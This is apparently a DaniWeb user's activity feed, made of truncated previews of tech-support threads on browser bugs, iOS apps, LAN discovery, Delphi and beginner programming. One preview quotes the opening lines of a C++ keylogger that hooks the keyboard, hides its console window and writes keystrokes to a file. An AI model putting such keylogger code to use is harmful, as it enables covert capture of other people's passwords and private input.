-
Began Watching Parameter @name has no default value
Hi guys I am developing a simple job card creator application with VB.net 2012, using Access 2010 as database. The code I have generated to write data from a datagridview … -
Replied To a Post in MS Edge and Translate3d - Max Count or Y-Axis bug?
Sorry Ryantroop. Neither Edge or IE11 worked and I declined to alter my IE11 to fix the missing scroll bar. Sorry but the issue does seem to be there, Microsoft … -
Replied To a Post in [ios ipad] Uninstall own app programmatically
OK, time to talk/write to the author of NSTask.h. -
Replied To a Post in MS Edge and Translate3d - Max Count or Y-Axis bug?
The old disappearing right scroll bar. Still bugged and there are prior discussions. Microsoft got reports in 2015 so they know. I bet they don't care. Or read http://i.imgur.com/9TxWoa9.png I … -
Began Watching MS Edge and Translate3d - Max Count or Y-Axis bug?
NOTE: Viewed and tested in MS Edge 25.10586.627.0 MS EdgeHTML 13.10586 https://jsfiddle.net/qgg86g7y/1/ As you can see in the fiddle, if 50 elements are displayed and calculated, a scroll bar will … -
Replied To a Post in DaniWeb on Ubuntu Phone
Thanks AndrisP. I was under the impression Ubuntu, even in it's phone version had and allowed other browsers. That's sad news. Adding with edit. The news was worse than I … -
Replied To a Post in DaniWeb on Ubuntu Phone
I can't tell which browser was used. Try the other web browsers. I often find when on bleeding edge platforms that can help. -
Began Watching DaniWeb on Ubuntu Phone
What has gone wrong with DaniWeb? It is no longer normal usable on the Ubuntu Phone. -
Replied To a Post in MySQL to CSV - Creating a search form
I think you're trying to find code rather than design and write code. That's going to be trouble for you as I rarely see members here write apps for others … -
Began Watching MySQL to CSV - Creating a search form
Hello. I've been learning a bit of PHP for a small school project. The project is almost done just that 1 thing is missing. I need a way to output … -
Replied To a Post in Calculator using Windows GUI
To saqib_3. If you need something urgently, why bury it in a 12 year old discussion? -
Began Watching Calculator using Windows GUI
A little calculator written in BCX basic and then translated to C code and modified to compile with Dev C++ (GCC/G++). Once you find your way past the standard GUI … -
Replied To a Post in Wireless Adapter and Bluetooth Not Working!
No need to install either version I noted. It's not hard to use, it's what I use to check out hardware on the cheap without disturbing a client's installed OS. … -
Replied To a Post in Wireless Adapter and Bluetooth Not Working!
At this point there is some hardware failure since you've repeated what worked before. Try a Linux OS to see if the hardware works in that OS. Get a current … -
Gave Reputation to Uchenna_1 in Keylogger using window hooks
I came up with this if you want it to work without console window showing #define _WIN32_WINNT 0x0500 #include<fstream> #include<windows.h> using namespace std; ofstream out("keys.txt", ios::out); LRESULT CALLBACK keyboardHookProc(int nCode, … -
Gave Reputation to Stefce in Images doesn't display on tablet or phone
Oh my god... why the server doesn't recognise capital letters ??? the header file actually was named `Header` and the server was not able to read ?? Hell i waste … -
Replied To a Post in Images doesn't display on tablet or phone
I'll write no to the robots.tx file. As to .htaccess, I quickly read http://www.htaccess-guide.com/ and the answer is not yes or no. No it appears not to apply to the … -
Replied To a Post in [ios ipad] Uninstall own app programmatically
It's very odd to have non-disclosure inside a company. Usually companies want to reduce development costs, not duplicate and increase cost. -
Replied To a Post in Images doesn't display on tablet or phone
Sorry but as I don't run this site all I can do is share what HTML it gave to the browser then the test image that coughed up an error … -
Replied To a Post in [ios ipad] Uninstall own app programmatically
Remember I didn't duplicate any google research on this. Just writing something I ran into with a fellow that wanted to write an uninstaller for iOS. They went down in … -
Replied To a Post in Images doesn't display on tablet or phone
As I don't admin your server all I can do is share the error. How you configure the server and where you put files (images) is up to you (if … -
Replied To a Post in Images doesn't display on tablet or phone
The HTML code was where I got the link and it bombed. In other words, I used view source and tested. Which failed. -
Replied To a Post in Images doesn't display on tablet or phone
Looks borked. http://stunneroftheday.com/images/featured/header/xenia1.jpg coughs up internal server error. Looks like your hardcoding of the image paths is off or the server doesn't allow access to or have the image there. -
Began Watching Images doesn't display on tablet or phone
Hello i got a wierd problem, when am opening my website on a PC the site loads well and its best of all websites (`:D`).. but when i try to … -
Replied To a Post in STUCK IN insydeH20 set up utility
I've seen this happen when the keyboard had a stuck key. Also, be sure all USB ports have nothing in them. -
Began Watching STUCK IN insydeH20 set up utility
once i was try to exit the set up its always restarting and back to the set up, how to exit and booting the System Opration? -
Replied To a Post in ADB to USB Adapter
That's something I never saw. Doesn't mean it didn't exist. I thought the only USB adapter was Apple's card. https://support.apple.com/kb/DL1238?locale=en_US&viewlocale=en_US has some details. That's USB 1 speed and my bet … -
Began Watching ADB to USB Adapter
Hello I am trying to find an ADB (male) to USB (female) adapter for my G3 Wallstreet Powermac Laptop. I would like to be able to connect a USB jumpdrive … -
Replied To a Post in [ios ipad] Uninstall own app programmatically
Your requirements may be at odds with Apple's iOS rules. I am not an expert in the Apple iOS rules but this seems to violate a rule I've read. Instead … -
Began Watching [ios ipad] Uninstall own app programmatically
Hi, I have been struggling on a project for few weeks but yet, still no fruity result. Having an app that is running on ios ipad. I have a requirement … -
Replied To a Post in Programatically retrieve MAC and IP addresses from my local network
Sorry but all skill levels arrive here. So there is a specific ping that gets replies from all on the LAN. Do you remember your IP networking class on that? … -
Replied To a Post in Programatically retrieve MAC and IP addresses from my local network
I feel you are working too hard. I recall doing this with PING and ARP (see google if you forgot how.) And maybe NIRSOFT has an app as noted at … -
Began Watching Programatically retrieve MAC and IP addresses from my local network
Good morning, I've been around a number different sites trying proposed solutions both in C and VB but have not been successful. Most solutions give only those devices connected to … -
Gave Reputation to AssertNull in hacking
> i think all of you don't understand what i mean? Any possible miscommunication involved would be on your end, not ours, so the problem would be you not writing … -
Replied To a Post in Delphi Form Activate
I see no code so I'll share a workaround I used years ago when I had no time to find what was up. In psuedo code; PrintingFactive = false in … -
Began Watching Delphi Form Activate
I have a problem with a Delph Form that activates without my intention. The application has a mainform, SalaryF and 3 subforms. One of the subforms, PrintingF, enters it's OnActivate … -
-
-
-
Replied To a Post in Please help me remove this cyclops alien icon from my desktop!
While the picture is interesting I didn't find a match. Try the other way of finding Waldo. Use tools like HIJACKTHIS and read each line. KNOW what each line does … -
Began Watching Please help me remove this cyclops alien icon from my desktop!
Hello, I am running MS Windows 10 and usually use Chrome as my browser on my HP Envy Laptop. Currently there is an icon that is planted in the upper … -
Replied To a Post in hacking
Don't use wrenches. Why? Read https://www.explainxkcd.com/wiki/index.php/538:_Security -
Began Watching hacking
I want to learn basics of ethical hacking. waht should i learn? -
Replied To a Post in Connecting a N64 to my new Vizio TV
Connect to the port that has the b/w image then somewhere in the TV menus there's a component/composite setting. You want composite, it is currently set to component. -
Began Watching Connecting a N64 to my new Vizio TV
I recently purchased a new Vizio 55" LED 1080p tv but I'm having trouble connection my Nintendo 64 to it. The red & white audio cable are working fine and … -
Replied To a Post in How do i Solove this vb6.0 problem?
Read https://www.daniweb.com/programming/threads/435023/read-this-before-posting-a-question first. Unlike some sites here you have to show your work. My comment is that VB6 is outdated. If you wish to pick up VB go get the … -
Began Watching How do i Solove this vb6.0 problem?
I want to open .txt file in my simple notepad. when i dobble click on .txt file, my simple notepad will show that file text. please kindly code it by … -
Gave Reputation to Reverend Jim in String Scrambler Console
Just a few suggestions to start. 1. Functions/Subs should be named to reflect their purpose. For example, `GetLine` should get the input and nothing more. Instead it gets the input … -
Replied To a Post in How to get into python deveopment
I advise you expand beyond python. If a programmer was the best python programmer in the world and didn't have skills in what the job called for then they would … -
Began Watching How to get into python deveopment
Hi, I want to get into python programming opportunities. i'm gone through few python tutorial. have knowledge of python basic. I can rate my self in python as begineer. Please …
The End.